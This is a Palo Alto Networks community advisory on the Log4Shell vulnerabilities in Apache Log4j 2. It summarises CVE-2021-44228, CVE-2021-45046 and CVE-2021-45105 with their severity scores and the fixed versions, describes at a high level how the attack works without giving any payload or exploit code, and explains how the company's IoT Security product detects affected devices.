- Access exclusive content
- Connect with peers
- Share your expertise
- Find support resources
Disclaimer: This threat is rapidly evolving by the hour. Unit 42 researchers are updating this Unit 42 blog in real time, and therefore the blog serves as our single source of truth. The information provided is for general informational purposes only.
Updated: Dec 20, 2021
Cybersecurity researchers have identified a vulnerability that affects the Apache Log4j 2 Java logging library, an open-source Java-based logging framework leveraged by countless Java applications around the world. This vulnerability, dubbed Log4Shell, affects Apache log4j version 2. The Apache log4j 2 library allows developers to log data within an application and is widely used in many popular ones, such as Apache Struts, ElasticSearch, and Kafka.
The Log4j 2 vulnerability allows a malicious user to inject data in request payloads via HTTP, TCP, and other protocols. The malicious payload is then logged by the Java library logging system. If the victim server is vulnerable to the Log4j 2 vulnerability (that is, if it's running a vulnerable version of Log4j 2), an attacker can trigger it to request payloads from another attacker-controlled server, such as an LDAP server. By inserting malicious code into these payloads on a server that's under the attacker's control, the attacker can get the victim server to fetch and execute arbitrary code.
CVE ID |
CVSS v3.1 Score (Severity) |
Mitigation |
CVE-2021-44228 |
10.0 (Critical) |
This vulnerability targets Apache Log4j version 2 before 2.15-rc1. Apache released a new version of Log4j 2 to address this vulnerability. |
CVE-2021-45046 |
9.0 (Critical) |
It was discovered that Log4j 2.15-rc1, which Apache released to address CVE-2021-44228, was incomplete in certain non-default configurations. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. |
CVE-2021-45105 |
7.5 (High) |
Log4j 2.16.0, which Apache released to address CVE-2021-45046, did not protect against uncontrolled recursion from self-referential lookups. This allows an attacker to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0. |
At the time of writing, we have observed multiple exploits of these vulnerabilities in the wild. Customers are recommended to upgrade to the latest version (2.17.0) of Apache Log4j 2 for all systems. For more details, read the Palo Alto Networks Unit42 research report.
Palo Alto Networks IoT Security helps identify IoT devices and IoT device management servers where CVE-2021-44228, CVE-2021-45046, or CVE-2021-45105 are being exploited based on specific indicators of compromise or behavior observed in network traffic. Using machine learning and AI, IoT Security leverages anonymized cross-tenant data to create device profiles and behavioral models. It then uses its patented anomaly-detection mechanisms to distinguish deviations from normal network behavior. Such deviations can include, for example, a sudden appearance of traffic from a new source, an unusually high number of connections, or an inexplicable surge of certain attributes appearing in IoT application payloads. Finally, IoT Security generates alerts to notify administrators of the detected anomalous or suspicious behavior, explains if it’s indicative of known vulnerabilities, calls out security implications, and suggests actions to take to remediate the threat.
When IoT Security determines the identity of an IoT device and specifically the libraries it uses, it can alert you if it’s running an affected Apache Log4j library. If so, it displays a vulnerability alert in the IoT Security portal so you can take further action, such as updating the device to a software patch that doesn’t use the vulnerable library.
In addition, wherever applicable, IoT Security can work with other Palo Alto Networks security products such as WildFire, DNS Security, and Threat Prevention to provide more comprehensive protection of your devices. For example, Threat Prevention has specific detections to identify the CVE exploits related to the Log4j 2 vulnerabilities. Once identified, Threat Prevention can block any attempts to exploit these vulnerabilities.
If you find any device that is vulnerable to these CVEs or exhibiting anomalous behavior, or if you receive a security alert, consider taking the following actions:
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.
Subject | Likes |
---|---|
3 Likes | |
2 Likes | |
1 Like | |
1 Like | |
1 Like |